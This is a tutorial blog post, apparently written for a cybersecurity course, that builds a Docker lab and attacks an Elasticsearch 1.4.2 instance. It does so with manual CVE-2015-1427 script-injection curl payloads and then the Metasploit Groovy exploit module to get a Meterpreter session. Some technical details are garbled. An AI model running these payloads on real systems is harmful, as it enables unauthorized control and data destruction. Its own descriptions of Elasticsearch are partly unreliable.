Cybersecurity, Master Degree
by Pablo Clemente Pérez

Hacking Elasticsearch using Metasploit

Hello dear reader!

In this post we will be looking at how to use Metasploit, which we saw in the previous post, to hack an Elasticsearch cluster.

In order to do this we will be using Docker to run two instances, one with Elasticsearch and the other with Kali Linux, which has Metasploit installed. Docker can be downloaded from here.

The first thing we are going to do is create a file named CPElastic.yml and add the following content.

version: '3'
services:
  elastic:
    image: benhall/elasticsearch:1.4.2
    ports:
    - "9200:9200"
    networks:
        attacknet:
           ipv4_address: 192.168.12.36
  kali:
    image: kalilinux/kali-linux-docker 
    entrypoint: tail -f /dev/null
    networks:
        attacknet:
           ipv4_address: 192.168.12.56
networks:
  attacknet:
      ipam:
        driver: default
        config:
          - subnet: 192.168.12.0/24

With Docker enabled we can run the file using the following command:

docker-compose -p CP -f CPElastic.yml up -d

And check to see which processes are running with:

docker-compose -p CP -f CPElastic.yml ps

We can now connect to our Kali Linux instance running

 docker exec --privileged -it cp_kali_1 /bin/bash

With the system running and inside our host instance, the first thing we are going to do is scan the network to see where we are. The first initial, and rough, approach is to use:

ip addr

This shows that the kali linux instance is currently at the IP 192.168.12.56.

In order to continue exploring the network we have set up, we are going to need the popular unix utility nmap. We can install it using 

apt-get install nmap

Now we can perform a proper network scan looking for all the devices connected in the space 192.168.12.X. We can do that using

nmap -sP 192.168.12.0/24

From here we can see that the ElasticSearch cluster is currently at the IP 192.168.12.36.

Summarising, the addresses are:

  • ElasticSearch Instance: 192.168.12.36
  • Host instance with Kali Linux: 192.168.12.56

But before we start hacking, let’s dive a bit into what Elasticsearch and how it works.

Elasticsearch

Before understanding why Elasticsearch is so insecure it is vital to understand how the technology works. Elasticsearch was born to solve the problem that usual entity-relation databases were not thought out to handle full text searches. They were designed to search by index and specific data fields with partial information. There was a need to search for particular strings of characters and match them to a very large set. Elasticsearch was born as a response to this problem.

            So, in essence, it is a search and analysis engine which is distributed, easily scalable and accessible via a REST API. It is written in Java, using an open source code philosophy and an Apache license.

            Elasticsearch is based on Lucene (Apache Lucene is an open source API for data retrieval) which works in conjunction with a data collection engine called Logstash, and a performance analysis system –Kibana-. The three are designed to work together and conform what is referred to as the “Elastic Stack (ELK – Elastic, Logstash, Kibana)”. The main characteristics it boasts are:

  • It works with a non-relational database, documented orienteered, which does not use JSON.
  • It does not have a default schema, although it can be set.
  • Completely distributed, and highly scalable.
  • Exposes a powerful and fast API for data retrieval.
  • Allows searches using a specific language referred to as Query Domain Specific Language (DSL) that builds them using JSON. In this manner it is possible to search fields, apply filters, and build very complex queries. It is based on the operations defined by Lucene.

In general, the ELK uses the following ports:

  • 5601 (Kibana’s web interface).
  • 9200 (Elasticsearch’s JSON API Interface).
  • 5044 (Logstash Beats interface).
  • 5000 (Logstash Lumberjack Interface)

The one that is most used for Apps is the 9200 port, since it is the one that exposes the API. Elasticsearch does not provide an authenticated API, therefore it is very easy to perform a search once the URL or IP is obtained and acquire data from them.  This is referred to as “banner grabbing” and it is very easy to do by installing curl (a command line interpreter designed for data transmissions) with apt-get install curl. Using this we can create a REST API request attacking port 9200 using

curl http://192.168.12.36:9200

This renders the information shown below.

This confirms the information obtained previously and we can see the current Elasticsearch version is 1.4.2.

With this information we can perform a search on the NIST (National Institute of Standards and Technology) and find three CVE (Common Vulnerability Exploits). This will allow us to perform penetration testing.

Attacking Elasticsearch

Before launching into full attack mode, we will be using the REST API to add some information. For instance, I’ll be adding my name and Twitter account, this can be done with the following command.

curl -XPUT 'http://192.168.12.36:9200/twitter/user/pclemnte' -d '{ "name" : "Pablo Clemente" }'

We can check it has been created correctly using:

curl -XGET 'http://192.168.12.36:9200/twitter/user/pclemnte'

Now we have some data added, focusing on CVE-2015-1427, we will try launching scripts with Java Code to the instance. Before doing it with Metasploit and leveraging Meterpreter we will attempt to do it manually.  For instance we would be able to return the OS (Operating System) name running

curl http://192.168.12.36:9200/_search?pretty -XPOST -d '{"script_fields": {"nombreOS": {"script": "java.lang.Math.class.forName(\"java.lang.System\").getProperty( \"os.name\")"}}}'

The result is shown below, where we are successfully able to obtain the name of the operating system, in this case Linux.

We would be able to obtain much more information about the instance using.

getProperties() with the command curl http://192.168.12.36:9200/_search?pretty -XPOST -d '{"script_fields": {"Propiedades": {"script": "java.lang.Math.class.forName(\"java.lang.System\").getProperties( )"}}}'

As illustrated in the following image this returns a lot of valuable information about the instance.

We would be able to obtain much more information about the instance using getProperties() with the following command.

 curl http://192.168.12.36:9200/_search?pretty -XPOST -d '{"script_fields": {"Propiedades": {"script": "java.lang.Math.class.forName(\"java.lang.System\").getProperties( )"}}}'

As illustrated below this returns a lot of valuable information about the instance.

Using Metasploit

Now that we’ve understood the limitations and security issues of Elasticsearch launching the queries manually, we can use Metasploit to attack the system directly and gain tighter control.

We can install Metasploit using

apt-get install metasploit-framework

And launch it with

msfconsole -L

The first thing needed to perform a possible attack is searching the framework’s library like before, using

search elasticsearch

This renders the following results.

From here we can use one of the ones detailed in the NIST page with the command shown below.

use exploit/multi/elasticsearch/search_groovy_script

With that done, we need to set the IP of the destination instance, in this case we would use the command RHOST 192.168.12.36.

Finally, the exploit can be run using run.

With this we have opened a Meterpreter session which has essentially allowed us to gain full control of the instance. This would empower the attacker to navigate the Elasticsearch folders and modify or delete the data. This actually was used by a Hacker to delete 15000 Elasticsearch servers.

So what do you think? I have always found it incredible to think how easy this actually is. What do you think of Metasploit? Drop me a line in the comments!

Until next time!

Thanks for reading!